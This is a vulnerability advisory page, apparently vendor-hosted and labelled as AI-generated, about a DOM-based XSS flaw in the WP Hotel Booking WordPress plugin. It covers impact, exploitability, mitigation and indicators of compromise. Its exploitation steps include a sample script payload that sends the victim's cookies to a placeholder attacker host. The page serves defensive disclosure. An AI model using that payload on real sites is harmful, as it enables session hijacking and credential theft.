CVE-2025-63011: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-63011 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the ThimPress WP Hotel Booking WordPress plugin. It affects all versions up to and including 2.2.8, with version 2.2.9 being the patched release. The vulnerability was reported by researcher "daroo" on October 6, 2025, and published by Patchstack on November 5, 2025. It carries a CVSS v3.1 base score of 5.9 (Medium) (Patchstack).

Technical details

The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and manifests as DOM-Based XSS, meaning malicious script execution occurs client-side through manipulation of the DOM environment rather than server-side reflection. Exploitation requires an attacker with Editor-level privileges to craft a malicious payload, and a victim user must interact with the affected content (e.g., visit a crafted page or click a malicious link). No public proof-of-concept code has been identified at this time (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute malicious JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, or redirection to malicious sites. The scope is marked as "Changed," indicating the impact can extend beyond the vulnerable component to affect other resources, though confidentiality, integrity, and availability impacts are each rated Low (Patchstack).

Exploitability

No active in-the-wild exploitation has been reported for CVE-2025-63011, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.036%, indicating a very low probability of exploitation in the near term. Exploitation requires high privileges (Editor role) and user interaction, significantly limiting the attack surface. Patchstack classifies this as low priority with unlikely exploitation (Patchstack).

Exploitation steps

  1. Privilege Acquisition: Obtain or compromise an account with Editor-level (or higher) privileges on the target WordPress site running WP Hotel Booking <= 2.2.8.
  2. Payload Crafting: Construct a DOM-Based XSS payload designed to execute JavaScript when rendered in a victim's browser (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or equivalent DOM manipulation).
  3. Payload Injection: Insert the malicious payload into a vulnerable input field or parameter within the WP Hotel Booking plugin that is processed client-side without proper sanitization.
  4. Social Engineering: Deliver a link or trigger a scenario where a target user (e.g., an administrator) visits the page or interacts with the crafted content.
  5. Execution: The victim's browser processes the malicious DOM manipulation, executing the attacker's JavaScript and potentially exfiltrating session cookies, credentials, or performing unauthorized actions (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unusual requests to WP Hotel Booking plugin endpoints containing encoded JavaScript payloads (e.g., <script>, javascript:, onerror=, onload= patterns in URL parameters or POST bodies.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after interacting with hotel booking pages, potentially carrying cookie or session data as query parameters.
  • File System: Unexpected modifications to WP Hotel Booking plugin files in /wp-content/plugins/wp-hotel-booking/ that may indicate secondary compromise following XSS exploitation.
  • Browser/Application: Unexpected redirects or pop-ups on hotel booking pages; reports from users of unusual behavior after visiting booking-related pages on the site.

Mitigation and workarounds

The primary remediation is to update the WP Hotel Booking plugin to version 2.2.9 or later, which contains the fix for this vulnerability. Site administrators unable to update immediately should restrict Editor-level access to trusted users only and consider using a Web Application Firewall (WAF) to filter XSS payloads. Patchstack users can enable auto-update for vulnerable plugins to receive protection automatically (Patchstack).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management